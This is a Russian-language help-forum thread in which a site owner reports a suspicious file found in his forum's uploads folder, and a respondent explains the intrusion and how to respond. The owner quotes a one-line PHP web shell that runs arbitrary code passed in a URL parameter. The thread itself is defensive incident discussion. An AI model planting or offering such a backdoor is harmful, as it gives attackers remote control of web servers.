ART[FL] Опубликовано 23 Ноября 2012 Жалоба Поделиться Опубликовано 23 Ноября 2012 Здравствуйтесегодня получил от хостера письмо с сылкой на подозрительный файл на площадкессылка на сайт/www/forums/uploads/1.php в котором был ниже приведённый код <?eval(stripslashes($_GET[a]));?> как предотвратить появление сего взлома в будущем? что этим смог добиться взломщик, ведь всё на форуме работаетКак залатать дыру? в админке пишет версия форума 2.3.5, хотя помню что устанавливал последний патч 2.3.6, но он неотображается в панели Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 siv1987 Опубликовано 23 Ноября 2012 Жалоба Поделиться Опубликовано 23 Ноября 2012 как предотвратить появление сего взлома в будущем? Узнать каким образом посторонний код попал на форум, и закрыть уязвимость. Учитывая то, что вторая линейка давно не поддерживается, вам предстоит увлекательное занятие. что этим смог добиться взломщик Php code injection, со всеми вытекающими ведь всё на форуме работает А с чего на форуме что-то не должно работать? Во первых, сам этот код напрямую с форумом не связан, а во вторых цель взломщика наоборот остаться как можно незаметнее в системе, и "неработоспособность" у него входит в последнюю очередь. но он неотображается в панели В какой панели, и что там должно отображаться? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
![ART[FL]](data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%201024%201024%22%20style%3D%22background%3A%2362c4b3%22%3E%3Cg%3E%3Ctext%20text-anchor%3D%22middle%22%20dy%3D%22.35em%22%20x%3D%22512%22%20y%3D%22512%22%20fill%3D%22%23ffffff%22%20font-size%3D%22700%22%20font-family%3D%22-apple-system%2C%20BlinkMacSystemFont%2C%20Roboto%2C%20Helvetica%2C%20Arial%2C%20sans-serif%22%3EA%3C%2Ftext%3E%3C%2Fg%3E%3C%2Fsvg%3E)
Вопрос
ART[FL]
Здравствуйте
сегодня получил от хостера письмо с сылкой на подозрительный файл на площадке
ссылка на сайт/www/forums/uploads/1.php
в котором был ниже приведённый код
как предотвратить появление сего взлома в будущем? что этим смог добиться взломщик, ведь всё на форуме работает
Как залатать дыру?
в админке пишет версия форума 2.3.5, хотя помню что устанавливал последний патч 2.3.6, но он неотображается в панели
Ссылка на комментарий
Поделиться на других сайтах
1 ответ на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.